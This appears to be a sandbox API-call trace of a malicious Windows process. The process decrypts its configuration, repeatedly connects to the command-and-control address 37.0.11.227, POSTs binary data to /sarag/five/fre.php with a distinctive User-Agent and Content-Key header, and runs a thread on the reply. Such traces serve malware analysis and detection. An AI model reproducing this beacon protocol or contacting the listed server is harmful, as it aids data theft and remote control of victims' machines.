StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0285.867] GetProcessHeap () returned 0x690000 [0285.867] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0285.867] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0285.867] GetProcessHeap () returned 0x690000 [0285.868] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0285.868] GetProcessHeap () returned 0x690000 [0285.868] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0285.868] GetProcessHeap () returned 0x690000 [0285.868] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0285.869] GetProcessHeap () returned 0x690000 [0285.869] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a3fe0 [0285.869] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.870] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0285.875] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.876] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0285.884] GetProcessHeap () returned 0x690000 [0285.885] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0285.885] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.886] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0285.887] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.887] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0285.888] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.888] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0285.888] GetProcessHeap () returned 0x690000 [0285.889] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0285.891] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.892] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a3fe0, pdwDataLen=0x19fcfc | out: pbData=0x6a3fe0, pdwDataLen=0x19fcfc) returned 1 [0285.892] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.893] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0285.894] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0285.894] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0285.894] GetProcessHeap () returned 0x690000 [0285.894] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0285.895] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.895] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0285.896] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.897] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0285.898] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.898] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0285.899] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0285.899] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0285.899] GetProcessHeap () returned 0x690000 [0285.899] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0285.899] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0285.899] GetProcessHeap () returned 0x690000 [0285.899] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab340 [0285.899] socket (af=2, type=1, protocol=6) returned 0x91c [0285.900] connect (s=0x91c, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0285.927] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0285.927] GetProcessHeap () returned 0x690000 [0285.927] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aecc0 [0285.927] GetProcessHeap () returned 0x690000 [0285.927] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0285.928] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0285.929] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0285.929] GetProcessHeap () returned 0x690000 [0285.929] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b01c0 [0285.929] GetProcessHeap () returned 0x690000 [0285.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0285.929] GetProcessHeap () returned 0x690000 [0285.930] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0285.930] GetProcessHeap () returned 0x690000 [0285.930] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0285.930] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0285.931] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0285.931] GetProcessHeap () returned 0x690000 [0285.931] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0285.931] GetProcessHeap () returned 0x690000 [0285.932] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0285.932] send (s=0x91c, buf=0x6ad508*, len=242, flags=0) returned 242 [0285.933] send (s=0x91c, buf=0x6aba40*, len=159, flags=0) returned 159 [0285.933] GetProcessHeap () returned 0x690000 [0285.933] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0285.933] recv (in: s=0x91c, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0286.008] GetProcessHeap () returned 0x690000 [0286.008] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0286.008] GetProcessHeap () returned 0x690000 [0286.009] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0286.009] GetProcessHeap () returned 0x690000 [0286.010] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b01c0 | out: hHeap=0x690000) returned 1 [0286.010] GetProcessHeap () returned 0x690000 [0286.010] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0286.010] closesocket (s=0x91c) returned 0 [0286.010] GetProcessHeap () returned 0x690000 [0286.010] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab340 | out: hHeap=0x690000) returned 1 [0286.010] GetProcessHeap () returned 0x690000 [0286.011] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0286.011] GetProcessHeap () returned 0x690000 [0286.011] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0286.011] GetProcessHeap () returned 0x690000 [0286.012] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0286.012] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1750) returned 0x91c [0286.014] Sleep (dwMilliseconds=0xea60) [0286.015] GetProcessHeap () returned 0x690000 [0286.015] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0286.018] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.019] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.030] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.031] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aed48) returned 1 [0286.051] GetProcessHeap () returned 0x690000 [0286.052] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0286.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.054] CryptImportKey (in: hProv=0x6aed48, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0286.055] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.055] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.056] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.056] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.057] GetProcessHeap () returned 0x690000 [0286.058] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0286.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.059] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0286.060] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.061] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0286.061] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.062] CryptReleaseContext (hProv=0x6aed48, dwFlags=0x0) returned 1 [0286.062] GetProcessHeap () returned 0x690000 [0286.062] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0286.063] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.063] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0286.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.064] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0286.064] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.065] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0286.065] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.066] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0286.066] GetProcessHeap () returned 0x690000 [0286.066] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0286.066] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0286.066] GetProcessHeap () returned 0x690000 [0286.066] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0286.066] GetProcessHeap () returned 0x690000 [0286.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0286.067] GetProcessHeap () returned 0x690000 [0286.067] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0286.067] GetProcessHeap () returned 0x690000 [0286.067] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4460 [0286.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.068] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.073] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.073] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aecc0) returned 1 [0286.078] GetProcessHeap () returned 0x690000 [0286.078] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0286.079] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.079] CryptImportKey (in: hProv=0x6aecc0, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0286.080] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.080] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.081] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.081] GetProcessHeap () returned 0x690000 [0286.082] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0286.082] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.082] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4460, pdwDataLen=0x19fcfc | out: pbData=0x6a4460, pdwDataLen=0x19fcfc) returned 1 [0286.083] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.083] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0286.084] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.084] CryptReleaseContext (hProv=0x6aecc0, dwFlags=0x0) returned 1 [0286.084] GetProcessHeap () returned 0x690000 [0286.084] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0286.085] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.085] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0286.086] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.086] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0286.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.087] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0286.087] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.088] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0286.088] GetProcessHeap () returned 0x690000 [0286.088] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0286.088] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0286.088] GetProcessHeap () returned 0x690000 [0286.088] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab4f0 [0286.088] socket (af=2, type=1, protocol=6) returned 0x920 [0286.088] connect (s=0x920, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0286.117] FreeAddrInfoW (pAddrInfo=0x6a2f20*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0286.117] GetProcessHeap () returned 0x690000 [0286.117] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af188 [0286.117] GetProcessHeap () returned 0x690000 [0286.117] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0286.118] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0286.120] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0286.120] GetProcessHeap () returned 0x690000 [0286.120] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6b0280 [0286.120] GetProcessHeap () returned 0x690000 [0286.120] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0286.121] GetProcessHeap () returned 0x690000 [0286.121] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4730 [0286.121] GetProcessHeap () returned 0x690000 [0286.121] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0286.122] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0286.123] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0286.123] GetProcessHeap () returned 0x690000 [0286.123] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0286.123] GetProcessHeap () returned 0x690000 [0286.124] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0286.124] send (s=0x920, buf=0x6ad508*, len=242, flags=0) returned 242 [0286.124] send (s=0x920, buf=0x6aba40*, len=159, flags=0) returned 159 [0286.125] GetProcessHeap () returned 0x690000 [0286.125] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0286.125] recv (in: s=0x920, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0286.239] GetProcessHeap () returned 0x690000 [0286.239] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0286.240] GetProcessHeap () returned 0x690000 [0286.240] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0286.240] GetProcessHeap () returned 0x690000 [0286.240] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b0280 | out: hHeap=0x690000) returned 1 [0286.241] GetProcessHeap () returned 0x690000 [0286.241] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6af188 | out: hHeap=0x690000) returned 1 [0286.241] closesocket (s=0x920) returned 0 [0286.242] GetProcessHeap () returned 0x690000 [0286.242] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab4f0 | out: hHeap=0x690000) returned 1 [0286.242] GetProcessHeap () returned 0x690000 [0286.242] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0286.242] GetProcessHeap () returned 0x690000 [0286.243] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0286.243] GetProcessHeap () returned 0x690000 [0286.243] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0286.244] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1754) returned 0x920 [0286.245] Sleep (dwMilliseconds=0xea60) [0286.247] GetProcessHeap () returned 0x690000 [0286.247] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4418 [0286.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.254] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0286.261] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.261] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aef68) returned 1 [0286.268] GetProcessHeap () returned 0x690000 [0286.268] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a87f0 [0286.269] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.269] CryptImportKey (in: hProv=0x6aef68, pbData=0x6a87f0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0286.270] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.271] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0286.271] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.271] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0286.272] GetProcessHeap () returned 0x690000 [0286.272] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a87f0 | out: hHeap=0x690000) returned 1 [0286.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.273] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4418, pdwDataLen=0x19fcfc | out: pbData=0x6a4418, pdwDataLen=0x19fcfc) returned 1 [0286.288] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.289] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0286.289] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0286.290] CryptReleaseContext (hProv=0x6aef68, dwFlags=0x0) returned 1 [0286.290] GetProcessHeap () returned 0x690000 [0286.290] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0286.291] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.291] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0286.292] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.292] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0286.293] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.293] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0286.294] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0286.294] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0286.294] GetProcessHeap () returned 0x690000 [0286.294] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f48 [0286.294] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0286.295] GetProcessHeap () returned 0x690000 [0286.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f48 | out: hHeap=0x690000) returned 1 [0286.295] GetProcessHeap () returned 0x690000 [0286.295] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0286.295] GetProcessHeap () returned 0x690000 [0286.296] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0286.296] GetProcessHeap () returned 0x690000 [0286.296] RtlAllocateHeap 